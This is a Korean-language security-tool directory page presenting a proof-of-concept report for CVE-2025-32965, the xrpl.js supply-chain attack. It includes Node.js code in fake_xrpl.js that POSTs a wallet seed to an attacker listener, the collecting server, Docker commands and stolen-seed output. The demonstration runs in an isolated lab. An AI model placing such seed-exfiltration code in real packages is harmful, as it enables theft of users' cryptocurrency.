Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32965-xrpl-js-poc — CVE 코드: CVE-2025-32965 취약점 유형: 공급망 공격 (CWE-506: 내장된 악성 코드) 대상: xrpl.js 라이브러리 버전 4.2.1–4.2.4 및 2.14.2 영향: 사용자의 지갑 시드/시크릿 데이터가 공격자에게 전송됨 | Kitploit
도구/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
Vulnerability AnalysisExploitationData ExfiltrationMalware AnalysisSupply Chain SecurityLearning & Education
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

CVE 코드: CVE-2025-32965 취약점 유형: 공급망 공격 (CWE-506: 내장된 악성 코드) 대상: xrpl.js 라이브러리 버전 4.2.1–4.2.4 및 2.14.2 영향: 사용자의 지갑 시드/시크릿 데이터가 공격자에게 전송됨

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32965 — xrpl.js 공급망 공격 PoC 보고서

취약점 설명

  • CVE 코드: CVE-2025-32965
  • 취약점 유형: 공급망 공격 (CWE-506: 악성 코드 내장)
  • 대상: xrpl.js 라이브러리의 4.2.1–4.2.4 및 2.14.2 버전
  • 영향: 사용자의 지갑 시드/비밀 데이터가 공격자에게 전송됨

목적

이 PoC는 악성 xrpl.js 버전이 격리된 환경에서 시드 추출(exfiltration)을 어떻게 수행할 수 있는지 보여주는 것을 목적으로 합니다.

환경 구성

  • 플랫폼: Docker (WSL 기반 Ubuntu)
  • 네트워크: xrplnet이라는 전용 Docker 네트워크
  • 컨테이너:
    • poc-listener: 시드 데이터를 수집하는 공격자 서버
    • xrpl-poc: 피해자 측 테스트 스크립트를 포함하는 PoC 컨테이너

사용된 파일

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

단계

  1. Docker 빌드:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. 리스너 시작:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. 피해자 시드 전송:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

출력 예시

피해자 터미널:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

공격자 터미널:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

결론

이 PoC는 CVE-2025-32965 취약점이 실제로 어떻게 악용될 수 있는지 보여주었습니다. 악성 xrpl.js 라이브러리의 시드 추출 코드가 격리된 테스트 환경에서 성공적으로 실행되어 공격자 서버로 데이터가 유출되었습니다.

GitHub 저장소 구조 (권장)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

작성자: Yusuf Dalbudak 테스트 환경: WSL2 + Docker + Node.js v20

도구 다운로드